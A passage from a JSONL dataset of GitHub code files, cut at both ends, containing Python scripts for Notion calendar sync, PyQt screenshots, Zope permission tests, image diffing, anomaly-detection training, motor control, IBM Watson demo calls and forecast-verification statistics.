start = value[1]\n end = None\n else:\n start = value[0]\n end = value[1]\n\n return {\n 'start': start,\n 'end': end\n }\n elif isinstance(value, dict):\n n_start = value.get('start')\n n_end = value.get('end')\n if not n_end:\n start = None\n due = n_start\n else:\n start = n_start\n due = n_end\n return (start, due)\n elif value is None:\n return (None, None)\n else:\n raise ValueError('Unexpected value type')\n\n\ndef utc_from_notion_stamp(time):\n return pytz.utc.localize(datetime.strptime(\n time,\n '%Y-%m-%dT%H:%M:%S.%fZ')\n )\n\n\ndef normalize_notion_timestamp(time_str):\n return utc_from_notion_stamp(time_str).isoformat()\n\n\ndef load_cache(cache_path=CACHE_PATH):\n if path.exists(cache_path):\n with open(cache_path, 'r', encoding='utf-8') as f:\n data = json.load(f)\n logging.info(f'Loaded {len(data)} items from cache...')\n tasks = [Task(**obj) for obj in data]\n else:\n tasks = []\n logging.info('Created new cache file...')\n return tasks\n\n\ndef dump_cache(tasks, cache_path=CACHE_PATH):\n for t in tasks:\n t.cached = True\n data = [t.__dict__ for t in tasks]\n with open(cache_path, 'w', encoding='utf-8') as create_file:\n json.dump(data, create_file, ensure_ascii=False, indent=4)\n logging.info(f'Saved {len(data)} items to cache...')\n \n\nasync def main():\n # setup logger\n root_logger = logging.getLogger()\n log_level = logging.getLevelName(CONFIG.get('logger'))\n root_logger.setLevel(log_level)\n handler = logging.FileHandler('./logs/last_run.log', 'w', 'utf-8')\n handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s %(message)s'))\n console = logging.StreamHandler()\n console.setLevel(log_level)\n root_logger.addHandler(handler)\n\n # setup connections\n notion = get_notion_client(log_level=log_level)\n\n\nif __name__ == '__main__':\n\n try:\n asyncio.run(main())\n except Exception:\n logging.exception('Unhandled Exception', exc_info=1)\n","repo_name":"thumDer/notion-caldav","sub_path":"notion_caldav.py","file_name":"notion_caldav.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"8743429247","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui\n\n\ndef on_clicked():\n window.move(-window.width() * 2, 0)\n QtCore.QTimer.singleShot(1000, on_timeout)\n\n\ndef on_timeout():\n desktop = QtGui.QApplication.desktop()\n rect1 = window.geometry()\n rect2 = window.frameGeometry()\n sw = 0 - window.x() - ((rect2.width() - rect1.width()) // 2)\n sh = 0 - window.y() - rect1.top() - window.y()\n QtGui.QPixmap.grabWindow(window.winId(),\n sw, sh,\n desktop.width(), desktop.height()\n ).save(\"screen.png\", \"PNG\")\n window.move(0, 0)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtGui.QApplication(sys.argv)\n window = QtGui.QWidget()\n window.setWindowTitle(\"Класс QPixmap\")\n window.move(0, 0)\n box = QtGui.QVBoxLayout()\n button = QtGui.QPushButton(\"Сделать скриншот экрана\")\n button.clicked.connect(on_clicked)\n box.addWidget(button)\n window.setLayout(box)\n window.show()\n sys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/006_Working with graphics/003_Working with Images/582. QPixmap_grabWindow_desktop.py","file_name":"582. QPixmap_grabWindow_desktop.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31034972448","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom hamcrest import assert_that\nfrom hamcrest import contains\nfrom hamcrest import has_length\nfrom hamcrest import is_\n\nfrom zope.component.hooks import getSite\n\nfrom zope.securitypolicy.interfaces import IPrincipalPermissionMap\nfrom zope.securitypolicy.interfaces import IPrincipalRoleManager\n\nfrom zope.securitypolicy.settings import Allow\nfrom zope.securitypolicy.settings import Unset\n\nfrom nti.app.products.zapier.authorization import ACT_VIEW_EVENTS\n\nfrom nti.app.testing.application_webtest import ApplicationLayerTest\n\nfrom nti.app.testing.decorators import WithSharedApplicationMockDS\n\nfrom nti.dataserver.authorization import ROLE_SITE_ADMIN_NAME\n\nfrom nti.dataserver.tests import mock_dataserver as mock_ds\n\nfrom nti.dataserver.users.common import set_user_creation_site\n\n\nclass TestUserPrincipalPermissionMap(ApplicationLayerTest):\n\n @WithSharedApplicationMockDS(users=(\"site.admin\",\n \"diff.site.admin\",\n \"not.site.admin\"))\n def test_mixed_admins(self):\n with mock_ds.mock_db_trans(self.ds,\n site_name=\"alpha.nextthought.com\"):\n # A user that can administer \"not.site.admin\"\n admin = self._get_user('site.admin')\n site = getSite()\n site_name = site.__name__\n set_user_creation_site(admin, site_name)\n prm = IPrincipalRoleManager(site)\n prm.assignRoleToPrincipal(ROLE_SITE_ADMIN_NAME, admin.username)\n\n # A user that cannot administer \"not.site.admin\"\n diff_site_admin = self._get_user('diff.site.admin')\n set_user_creation_site(diff_site_admin, 'janux.ou.edu')\n prm.assignRoleToPrincipal(ROLE_SITE_ADMIN_NAME,\n diff_site_admin.username)\n\n # User to check against\n not_admin = self._get_user('not.site.admin')\n set_user_creation_site(not_admin, site_name)\n\n ppm = IPrincipalPermissionMap(not_admin)\n principals = ppm.getPrincipalsForPermission(ACT_VIEW_EVENTS.id)\n assert_that(principals, has_length(1))\n assert_that(principals, contains((admin.username, Allow)))\n\n perms = ppm.getPermissionsForPrincipal(admin.username)\n assert_that(perms, has_length(1))\n assert_that(perms, contains((ACT_VIEW_EVENTS.id, Allow)))\n\n perms = ppm.getPermissionsForPrincipal(diff_site_admin.username)\n assert_that(perms, has_length(0))\n\n setting = ppm.getSetting(ACT_VIEW_EVENTS.id, admin.username)\n assert_that(setting, is_(Allow))\n\n setting = ppm.getSetting(ACT_VIEW_EVENTS.id, diff_site_admin.username)\n assert_that(setting, is_(Unset))\n\n prin_perms = ppm.getPrincipalsAndPermissions()\n assert_that(prin_perms, has_length(1))\n assert_that(prin_perms, contains((admin.username, ACT_VIEW_EVENTS.id, Allow)))\n\n # Our diff site user should be able to admin themselves\n ppm = IPrincipalPermissionMap(diff_site_admin)\n principals = ppm.getPrincipalsForPermission(ACT_VIEW_EVENTS.id)\n assert_that(principals, has_length(1))\n assert_that(principals, contains((diff_site_admin.username, Allow)))\n\n perms = ppm.getPermissionsForPrincipal(admin.username)\n assert_that(perms, has_length(0))\n\n perms = ppm.getPermissionsForPrincipal(diff_site_admin.username)\n assert_that(perms, has_length(1))\n assert_that(perms, contains((ACT_VIEW_EVENTS.id, Allow)))\n\n setting = ppm.getSetting(ACT_VIEW_EVENTS.id, admin.username)\n assert_that(setting, is_(Unset))\n\n setting = ppm.getSetting(ACT_VIEW_EVENTS.id, diff_site_admin.username)\n assert_that(setting, is_(Allow))\n\n prin_perms = ppm.getPrincipalsAndPermissions()\n assert_that(prin_perms, has_length(1))\n assert_that(prin_perms, contains((diff_site_admin.username, ACT_VIEW_EVENTS.id, Allow)))\n\n @WithSharedApplicationMockDS(users=(\"alpha.user.1\",\n \"diff-site.user\",\n \"alpha.user.2\"))\n def test_no_admins(self):\n with mock_ds.mock_db_trans(self.ds,\n site_name=\"alpha.nextthought.com\"):\n site = getSite()\n site_name = site.__name__\n\n alpha_one = self._get_user('alpha.user.1')\n set_user_creation_site(alpha_one, site_name)\n diff_site_user = self._get_user('diff-site.user')\n set_user_creation_site(diff_site_user, 'diff-site')\n alpha_two = self._get_user('alpha.user.2')\n set_user_creation_site(alpha_two, site_name)\n\n ppm = IPrincipalPermissionMap(alpha_two)\n principals = ppm.getPrincipalsForPermission(ACT_VIEW_EVENTS.id)\n assert_that(principals, has_length(0))\n\n perms = ppm.getPermissionsForPrincipal(alpha_one.username)\n assert_that(perms, has_length(0))\n\n setting = ppm.getSetting(ACT_VIEW_EVENTS.id, alpha_one.username)\n assert_that(setting, is_(Unset))\n\n prin_perms = ppm.getPrincipalsAndPermissions()\n assert_that(prin_perms, has_length(0))\n","repo_name":"OpenNTI/nti.app.products.zapier","sub_path":"src/nti/app/products/zapier/tests/test_zope_security.py","file_name":"test_zope_security.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9627686230","text":"# https://leetcode.com/problems/plus-one/\n\"\"\" \nSuccess\nRuntime: 33 ms, faster than 26.14% of Python online submissions for Plus One.\nMemory Usage: 13.3 MB, less than 71.06% of Python online submissions for Plus One.\n \"\"\"\n\nclass Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n # # Simple using methods to convert back and forth from ints to strings\n # str1 = \"\".join(str(e) for e in digits)\n # list1 = list(str(int(str1) + 1))\n # return [int(e) for e in list1]\n \n '''\n Given: [8,9,9,9]\n \n Output: [9,0,0,0]\n ^\n index: 3\n '''\n \n index = len(digits) - 1\n while digits[index] == 9:\n digits[index] = 0\n if index == 0:\n digits.insert(0, 1)\n return digits\n if digits[index - 1] != 9:\n digits[index - 1] += 1\n return digits\n index -= 1\n digits[index] += 1\n return digits\n \n\n # grab the last element of the list\n # while it is 9, turn it into a 0\n # and increment the preceding number\n # repeat if that preceding number was also a 9.\n # if preceding number is not a 9, just increment it like normal, then return because no more operations are needed\n # if preceding number is out of range (beginning of array), must insert a 1 to the beginning of the array. return the array. \n # else, increment the digit it by 1\n # return the list\n \n \"\"\"\n Add 1 to an array of digits as if it were a whole number\n Given: [9, 9, 9, 9]\n Output: [1, 0, 0, 0, 0]\n \n Given: [9, 9]\n Output: [1, 0, 0]\n \"\"\"\n \n ","repo_name":"stanjdev/SPD-1.4-coding-interview-questions","sub_path":"66_plus_one.py","file_name":"66_plus_one.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12910056505","text":"import itertools\nimport StringIO\nfrom PIL import Image\n\n\ndef _AreTheSameSize(images):\n \"\"\"Returns whether a set of images are the size size.\n\n Args:\n images: a list of images to compare.\n\n Returns:\n boolean.\n\n Raises:\n Exception: One image or fewer is passed in.\n \"\"\"\n if len(images) > 1:\n return all(images[0].size == img.size for img in images[1:])\n else:\n raise Exception('No images passed in.')\n\n\ndef _GetDifferenceWithMask(image1, image2, mask=None,\n masked_color=(225, 225, 225, 255),\n same_color=(255, 255, 255, 255),\n different_color=(210, 0, 0, 255)):\n \"\"\"Returns an image representing the difference between the two images.\n\n This function computes the difference between two images taking into\n account a mask if it is provided. The final three arguments represent\n the coloration of the generated image.\n\n Args:\n image1: the first image to compare.\n image2: the second image to compare.\n mask: an optional mask image consisting of only black and white pixels\n where white pixels indicate the portion of the image to be masked out.\n masked_color: the color of a masked section in the resulting image.\n same_color: the color of an unmasked section that is the same.\n between images 1 and 2 in the resulting image.\n different_color: the color of an unmasked section that is different\n between images 1 and 2 in the resulting image.\n\n Returns:\n A 2-tuple with an image representing the unmasked difference between the\n two input images and the number of different pixels.\n\n Raises:\n Exception: if image1, image2, and mask are not the same size.\n \"\"\"\n image_mask = mask\n if not mask:\n image_mask = Image.new('RGBA', image1.size, (0, 0, 0, 255))\n if not _AreTheSameSize([image1, image2, image_mask]):\n raise Exception('images and mask must be the same size.')\n image_diff = Image.new('RGBA', image1.size, (0, 0, 0, 255))\n data = []\n diff_pixels = 0\n for m, px1, px2 in itertools.izip(image_mask.getdata(),\n image1.getdata(),\n image2.getdata()):\n if m == (255, 255, 255, 255):\n data.append(masked_color)\n elif px1 == px2:\n data.append(same_color)\n else:\n data.append(different_color)\n diff_pixels += 1\n\n image_diff.putdata(data)\n return (image_diff, diff_pixels)\n\n\ndef CreateMask(images):\n \"\"\"Computes a mask for a set of images.\n\n Returns a difference mask that is computed from the images\n which are passed in. The mask will have a white pixel\n anywhere that the input images differ and a black pixel\n everywhere else.\n\n Args:\n images: list of images to compute the mask from.\n\n Returns:\n an image of only black and white pixels where white pixels represent\n areas in the input images that have differences.\n\n Raises:\n Exception: if the images passed in are not of the same size.\n Exception: if fewer than one image is passed in.\n \"\"\"\n if not images:\n raise Exception('mask must be created from one or more images.')\n mask = Image.new('RGBA', images[0].size, (0, 0, 0, 255))\n image = images[0]\n for other_image in images[1:]:\n mask = _GetDifferenceWithMask(\n image,\n other_image,\n mask,\n masked_color=(255, 255, 255, 255),\n same_color=(0, 0, 0, 255),\n different_color=(255, 255, 255, 255))[0]\n return mask\n\n\ndef AddMasks(masks):\n \"\"\"Combines a list of mask images into one mask image.\n\n Args:\n masks: a list of mask-images.\n\n Returns:\n a new mask that represents the sum of the masked\n regions of the passed in list of mask-images.\n\n Raises:\n Exception: if masks is an empty list, or if masks are not the same size.\n \"\"\"\n if not masks:\n raise Exception('masks must be a list containing at least one image.')\n if len(masks) > 1 and not _AreTheSameSize(masks):\n raise Exception('masks in list must be of the same size.')\n white = (255, 255, 255, 255)\n black = (0, 0, 0, 255)\n masks_data = [mask.getdata() for mask in masks]\n image = Image.new('RGBA', masks[0].size, black)\n image.putdata([white if white in px_set else black\n for px_set in itertools.izip(*masks_data)])\n return image\n\n\ndef ConvertDiffToMask(diff):\n \"\"\"Converts a Diff image into a Mask image.\n\n Args:\n diff: the diff image to convert.\n\n Returns:\n a new mask image where everything that was masked or different in the diff\n is now masked.\n \"\"\"\n white = (255, 255, 255, 255)\n black = (0, 0, 0, 255)\n diff_data = diff.getdata()\n image = Image.new('RGBA', diff.size, black)\n image.putdata([black if px == white else white for px in diff_data])\n return image\n\n\ndef VisualizeImageDifferences(image1, image2, mask=None):\n \"\"\"Returns an image repesenting the unmasked differences between two images.\n\n Iterates through the pixel values of two images and an optional\n mask. If the pixel values are the same, or the pixel is masked,\n (0,0,0) is stored for that pixel. Otherwise, (255,255,255) is stored.\n This ultimately produces an image where unmasked differences between\n the two images are white pixels, and everything else is black.\n\n Args:\n image1: an RGB image\n image2: another RGB image of the same size as image1.\n mask: an optional RGB image consisting of only white and black pixels\n where the white pixels represent the parts of the images to be masked\n out.\n\n Returns:\n A 2-tuple with an image representing the unmasked difference between the\n two input images and the number of different pixels.\n\n Raises:\n Exception: if the two images and optional mask are different sizes.\n \"\"\"\n return _GetDifferenceWithMask(image1, image2, mask)\n\n\ndef InflateMask(image, passes):\n \"\"\"A function that adds layers of pixels around the white edges of a mask.\n\n This function evaluates a 'frontier' of valid pixels indices. Initially,\n this frontier contains all indices in the image. However, with each pass\n only the pixels' indices which were added to the mask by inflation\n are added to the next pass's frontier. This gives the algorithm a\n large upfront cost that scales negligably when the number of passes\n is increased.\n\n Args:\n image: the RGBA PIL.Image mask to inflate.\n passes: the number of passes to inflate the image by.\n\n Returns:\n A RGBA PIL.Image.\n \"\"\"\n inflated = Image.new('RGBA', image.size)\n new_dataset = list(image.getdata())\n old_dataset = list(image.getdata())\n\n frontier = set(range(len(old_dataset)))\n new_frontier = set()\n\n l = [-1, 1]\n\n def _ShadeHorizontal(index, px):\n col = index % image.size[0]\n if px == (255, 255, 255, 255):\n for x in l:\n if 0 <= col + x < image.size[0]:\n if old_dataset[index + x] != (255, 255, 255, 255):\n new_frontier.add(index + x)\n new_dataset[index + x] = (255, 255, 255, 255)\n\n def _ShadeVertical(index, px):\n row = index / image.size[0]\n if px == (255, 255, 255, 255):\n for x in l:\n if 0 <= row + x < image.size[1]:\n if old_dataset[index + image.size[0] * x] != (255, 255, 255, 255):\n new_frontier.add(index + image.size[0] * x)\n new_dataset[index + image.size[0] * x] = (255, 255, 255, 255)\n\n for _ in range(passes):\n for index in frontier:\n _ShadeHorizontal(index, old_dataset[index])\n _ShadeVertical(index, old_dataset[index])\n old_dataset, new_dataset = new_dataset, new_dataset\n frontier, new_frontier = new_frontier, set()\n inflated.putdata(new_dataset)\n return inflated\n\n\ndef TotalDifferentPixels(image1, image2, mask=None):\n \"\"\"Computes the number of different pixels between two images.\n\n Args:\n image1: the first RGB image to be compared.\n image2: the second RGB image to be compared.\n mask: an optional RGB image of only black and white pixels\n where white pixels indicate the parts of the image to be masked out.\n\n Returns:\n the number of differing pixels between the images.\n\n Raises:\n Exception: if the images to be compared and the mask are not the same size.\n \"\"\"\n image_mask = mask\n if not mask:\n image_mask = Image.new('RGBA', image1.size, (0, 0, 0, 255))\n if _AreTheSameSize([image1, image2, image_mask]):\n total_diff = 0\n for px1, px2, m in itertools.izip(image1.getdata(),\n image2.getdata(),\n image_mask.getdata()):\n if m == (255, 255, 255, 255):\n continue\n elif px1 != px2:\n total_diff += 1\n else:\n continue\n return total_diff\n else:\n raise Exception('images and mask must be the same size')\n\n\ndef SameImage(image1, image2, mask=None):\n \"\"\"Returns a boolean representing whether the images are the same.\n\n Returns a boolean indicating whether two images are similar\n enough to be considered the same. Essentially wraps the\n TotalDifferentPixels function.\n\n\n Args:\n image1: an RGB image to compare.\n image2: an RGB image to compare.\n mask: an optional image of only black and white pixels\n where white pixels are masked out\n\n Returns:\n True if the images are similar, False otherwise.\n\n Raises:\n Exception: if the images (and mask) are different sizes.\n \"\"\"\n different_pixels = TotalDifferentPixels(image1, image2, mask)\n return different_pixels == 0\n\n\ndef EncodePNG(image):\n \"\"\"Returns the PNG file-contents of the image.\n\n Args:\n image: an RGB image to be encoded.\n\n Returns:\n a base64 encoded string representing the image.\n \"\"\"\n f = StringIO.StringIO()\n image.save(f, 'PNG')\n encoded_image = f.getvalue()\n f.close()\n return encoded_image\n\n\ndef DecodePNG(png):\n \"\"\"Returns a RGB image from PNG file-contents.\n\n Args:\n encoded_image: PNG file-contents of an RGB image.\n\n Returns:\n an RGB image\n \"\"\"\n return Image.open(StringIO.StringIO(png))\n","repo_name":"kiwibrowser/src","sub_path":"chrome/test/ispy/common/image_tools.py","file_name":"image_tools.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"5875127981","text":"import numpy as np\nimport pandas as pd\nfrom donut import complete_timestamp, standardize_kpi\n\nimport os\nimport time\nimport sys\nimport importlib\nimportlib.reload(sys)\nfrom metric import best_f1,delay_f1\n# Read the raw data.\n\ndata_name = sys.argv[1]\n\n\n\ntrain_values = np.load(os.path.join('./data/','{}_train_value.npy'.format(data_name)))\nvalid_values = np.load(os.path.join('./data/','{}_valid_value.npy'.format(data_name)))\ntest_values = np.load(os.path.join('./data/','{}_test_value.npy'.format(data_name)))\n\ntrain_labels = np.load(os.path.join('./data/','{}_train_label.npy'.format(data_name)))\nvalid_labels = np.load(os.path.join('./data/','{}_valid_label.npy'.format(data_name)))\ntest_labels = np.load(os.path.join('./data/','{}_test_label.npy'.format(data_name)))\n\ntrain_missing = np.load(os.path.join('./data/','{}_train_missing.npy'.format(data_name)))\nvalid_missing = np.load(os.path.join('./data/','{}_valid_missing.npy'.format(data_name)))\ntest_missing = np.load(os.path.join('./data/','{}_test_missing.npy'.format(data_name)))\n\n\ntrain_exclude_ori = np.load(os.path.join('./data/','{}_train_exclude.npy'.format(data_name)))\nvalid_exclude_ori = np.load(os.path.join('./data/','{}_valid_exclude.npy'.format(data_name)))\ntest_exclude_ori = np.load(os.path.join('./data/','{}_test_exclude.npy'.format(data_name)))\ntrain_exclude = np.zeros_like(train_values,dtype=bool)\nfor i in train_exclude_ori:\n train_exclude[int(i)]=True\nvalid_exclude = np.zeros_like(valid_values,dtype=bool)\nfor i in valid_exclude_ori:\n valid_exclude[int(i)]=True\n\n\n# Standardize the training and testing data.\ntrain_values, mean, std = standardize_kpi(\n train_values, excludes=train_missing)\nvalid_values, _, _ = standardize_kpi(valid_values, mean=mean, std=std)\ntest_values, _, _ = standardize_kpi(test_values, mean=mean, std=std)\n\nimport tensorflow as tf\nfrom donut import Donut\nfrom tensorflow import keras as K\nfrom tfsnippet.modules import Sequential\n\n# We build the entire model within the scope of `model_vs`,\n# it should hold exactly all the variables of `model`, including\n# the variables created by Keras layers.\nwith tf.variable_scope('model') as model_vs:\n model = Donut(\n h_for_p_x=Sequential([\n K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n activation=tf.nn.relu),\n K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n activation=tf.nn.relu),\n ]),\n h_for_q_z=Sequential([\n K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n activation=tf.nn.relu),\n K.layers.Dense(100, kernel_regularizer=K.regularizers.l2(0.001),\n activation=tf.nn.relu),\n ]),\n x_dims=120,\n z_dims=5,\n )\n\nfrom donut import DonutTrainer, DonutPredictor\n\ntrainer = DonutTrainer(model=model, model_vs=model_vs)\npredictor = DonutPredictor(model)\n\n\nwith tf.Session().as_default():\n trainer.fit(train_values, train_labels, train_missing, mean, std,train_values=train_values,valid_values=valid_labels,train_labels=train_labels,valid_labels=valid_labels,train_missing=train_missing,valid_missing=valid_missing,train_exclude=train_exclude,valid_exclude=valid_exclude)\n time1 = time.time()\n test_score = -predictor.get_score(test_values, test_missing)\n time2 = time.time()\n \n print('test_time',time2-time1)\n print(len(test_score))\n print(len(test_labels))\n #label = test_labels[119:]\n mask = np.ones_like(test_labels,dtype=bool)\n mask2 = np.ones_like(test_score,dtype=bool)\n for i in test_exclude_ori:\n mask[int(i)+1:int(i)+120]=False\n mask2[int(i)+1-119:int(i)+120-119]=False\n mask[:119]=False\n label = test_labels[mask]\n test_score = test_score[mask2]\n print(len(label),len(test_score))\n \n kk=7\n if sys.argv[1]=='Yahoo':\n kk=3\n elif sys.argv[1]=='NAB':\n kk=150\n max_f1,max_pre,max_recall,predict = best_f1(score=test_score,label=label)\n d_f1,d_pre,d_recall,d_predict = delay_f1(score=test_score,label=label,k=kk)\n with open('./all_result.txt','a') as f:\n f.write('time: %f f1: %f %f %f %f %f %f\\n'%(time2-time1,max_f1,max_pre,max_recall,d_f1,d_pre,d_recall))","repo_name":"CyberOoops/donut","sub_path":"cpu_train_all.py","file_name":"cpu_train_all.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15635760699","text":"__version__ = \"0.0.0-auto.0\"\n__repo__ = \"https://github.com/adafruit/Adafruit_CircuitPython_MotorKit.git\"\n\nimport board\nimport busio\nfrom adafruit_pca9685 import PCA9685\n\n\nclass MotorKit:\n \"\"\"Class representing an Adafruit DC & Stepper Motor FeatherWing, Shield or Pi Hat kit.\n\n Automatically uses the I2C bus on a Feather, Metro or Raspberry Pi.\"\"\"\n def __init__(self, address=0x60):\n self._motor1 = None\n self._motor2 = None\n self._motor3 = None\n self._motor4 = None\n self._stepper1 = None\n self._stepper2 = None\n i2c = busio.I2C(board.SCL, board.SDA)\n self._pca = PCA9685(i2c, address=address)\n self._pca.frequency = 1600\n\n # We can save memory usage (~300 bytes) by deduplicating the construction of the objects for\n # each motor. This saves both code size and the number of raw strings (the error message)\n # stored. The same technique is a net loss for stepper because there is less duplication.\n def _motor(self, motor_name, channels, stepper_name):\n from adafruit_motor import motor\n motor_name = \"_motor\" + str(motor_name)\n stepper_name = \"_stepper\" + str(stepper_name)\n if not getattr(self, motor_name):\n if getattr(self, stepper_name):\n raise RuntimeError(\n \"Cannot use {} at the same time as {}.\".format(motor_name[1:],\n stepper_name[1:]))\n self._pca.channels[channels[0]].duty_cycle = 0xffff\n setattr(self, motor_name, motor.DCMotor(self._pca.channels[channels[1]],\n self._pca.channels[channels[2]]))\n return getattr(self, motor_name)\n\n @property\n def motor1(self):\n return self._motor(1, (8, 9, 10), 1)\n\n @property\n def motor2(self):\n return self._motor(2, (13, 11, 12), 1)\n\n @property\n def motor3(self):\n return self._motor(3, (2, 3, 4), 2)\n\n @property\n def motor4(self):\n return self._motor(4, (7, 5, 6), 2)\n\n @property\n def stepper1(self):\n if not self._stepper1:\n from adafruit_motor import stepper\n if self._motor1 or self._motor2:\n raise RuntimeError(\"Cannot use stepper1 at the same time as motor1 or motor2.\")\n self._pca.channels[8].duty_cycle = 0xffff\n self._pca.channels[13].duty_cycle = 0xffff\n self._stepper1 = stepper.StepperMotor(self._pca.channels[10], self._pca.channels[9],\n self._pca.channels[11], self._pca.channels[12])\n return self._stepper1\n\n @property\n def stepper2(self):\n if not self._stepper2:\n from adafruit_motor import stepper\n if self._motor3 or self._motor4:\n raise RuntimeError(\"Cannot use stepper2 at the same time as motor3 or motor4.\")\n self._pca.channels[7].duty_cycle = 0xffff\n self._pca.channels[2].duty_cycle = 0xffff\n self._stepper2 = stepper.StepperMotor(self._pca.channels[4], self._pca.channels[3],\n self._pca.channels[5], self._pca.channels[6])\n return self._stepper2\n","repo_name":"Wolfjawan/S-R-P","sub_path":"adafruit_motorkit.py","file_name":"adafruit_motorkit.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39506021853","text":"import requests \n\nclass WatsonAPI:\n\tdef chunks(self, l, n):\n\t\tfor i in range(0, len(l), n):\n\t\t\tyield l[i:i + n]\n\n\tdef tone_analyzer(self, corpus):\n\t\turl = \"https://tone-analyzer-demo.mybluemix.net/api/tone\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus})\n\t\tresponse = resp.json()\n\t\tresponse = response['document_tone']\n\t\treturn response\n\n\n\tdef personality_traits(self, corpus):\n\t\turl = \"https://personality-insights-livedemo.mybluemix.net/api/profile/text\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus, \"language\": \"en\", \"source_type\":\"text\",\"accept_language\":\"en\",\"include_raw\":False})\n\t\tresponse = resp.json()\n\t\treturn response\n\n\n\tdef concepts(self, corpus):\n\t\turl = \"https://alchemy-language-demo.mybluemix.net/api/entities\"\n\t\tresp = requests.post(url, data = {\"text\" : corpus, \"sentiment\" : 1})\n\t\treturn resp.text","repo_name":"shivam5992/headline-feats","sub_path":"WatsonAPI.py","file_name":"WatsonAPI.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31019322029","text":"# ============================*\n # ** Copyright UCAR (c) 2020\n # ** University Corporation for Atmospheric Research (UCAR)\n # ** National Center for Atmospheric Research (NCAR)\n # ** Research Applications Lab (RAL)\n # ** P.O.Box 3000, Boulder, Colorado, 80307-3000, USA\n # ============================*\n \n \n \n\"\"\"\nProgram Name: eclv_statistics.py\n\"\"\"\nfrom typing import Union\nimport warnings\nimport numpy as np\n\nfrom metcalcpy.util.ctc_statistics import calculate_economic_value\nfrom metcalcpy.util.utils import sum_column_data_by_name\n\n__author__ = 'Tatiana Burek'\n\n\ndef calculate_eclv(input_data: np.array, columns_names: np.array,\n thresh: Union[float, None], line_type: str, cl_pts: list, add_base_rate: int = 0) \\\n -> Union[dict, None]:\n \"\"\"Performs calculation of ECLV - The Economic Cost Loss Value\n\n Args:\n input_data: 2-dimensional numpy array with data for the calculation\n 1st dimension - the row of data frame\n 2nd dimension - the column of data frame\n columns_names: names of the columns for the 2nd dimension as Numpy array\n thresh: threshold value for 'pct' line type\n cl_pts: Cost loss ratio. The relative value of being unprepared\n and taking a loss to that of un-necessarily preparing. For example,\n cl = 0.1 indicates it would cost $ 1 to prevent a $10 loss.\n This defaults to the sequence 0.05 to 0.95 by 0.05.\n line_type: line type of the data 'ctc' or 'pct'\n add_base_rate: add Base rate point to cl or not (1 = add, 0 = don't add)\n\n Returns:\n Returns:\n If assigned to an object, the following values are reported in the dictionary :\n vmax - Maximum value\n V - Vector of values for each cl value\n F - Conditional false alarm rate.\n H - Conditional hit rate\n cl - Vector of cost loss ratios.\n s - Base rate\n or None if some of the data values are missing or invalid\n \"\"\"\n warnings.filterwarnings('error')\n\n # some validation\n if line_type != 'ctc' and line_type != 'pct':\n print(f'ERROR: incorrect line type {line_type} for calculating ECLV ')\n return None\n if line_type == 'pct' and thresh is None:\n print(f'ERROR: provide thresh for calculating ECLV ')\n return None\n\n try:\n if line_type == 'pct':\n index_thresh_i = np.where(columns_names == 'thresh_i')[0]\n index_oy_i = np.where(columns_names == 'oy_i')[0]\n index_on_i = np.where(columns_names == 'on_i')[0]\n thresh_i_more = input_data[:, index_thresh_i] > thresh\n thresh_i_less = input_data[:, index_thresh_i] <= thresh\n\n n11 = np.nansum(input_data[:, index_oy_i][thresh_i_more].astype(np.float))\n n10 = np.nansum(input_data[:, index_on_i][thresh_i_more].astype(np.float))\n n01 = np.nansum(input_data[:, index_oy_i][thresh_i_less].astype(np.float))\n n00 = np.nansum(input_data[:, index_on_i][thresh_i_less].astype(np.float))\n else:\n n11 = sum_column_data_by_name(input_data, columns_names, 'fy_oy')\n n10 = sum_column_data_by_name(input_data, columns_names, 'fy_on')\n n01 = sum_column_data_by_name(input_data, columns_names, 'fn_oy')\n n00 = sum_column_data_by_name(input_data, columns_names, 'fn_on')\n\n result = calculate_economic_value(np.array([n11, n10, n01, n00]), cl_pts, add_base_rate == 1)\n except (TypeError, ZeroDivisionError, Warning, ValueError):\n result = None\n warnings.filterwarnings('ignore')\n return result\n","repo_name":"dtcenter/METcalcpy","sub_path":"metcalcpy/util/eclv_statistics.py","file_name":"eclv_statistics.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"4476723501","text":"def countAndSay(n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n nums = [1]\n count = 1\n while (count < n):\n stack = []\n i = 0\n j = 1\n while (True):\n if j == len(nums):\n stack.extend([j - i, nums[i]])\n break\n elif nums[i] == nums[j]:\n j += 1\n else:\n stack.extend([j - i, nums[i]])\n i = j\n j = i + 1\n # print(\"stack : \",stack)\n nums = stack\n count += 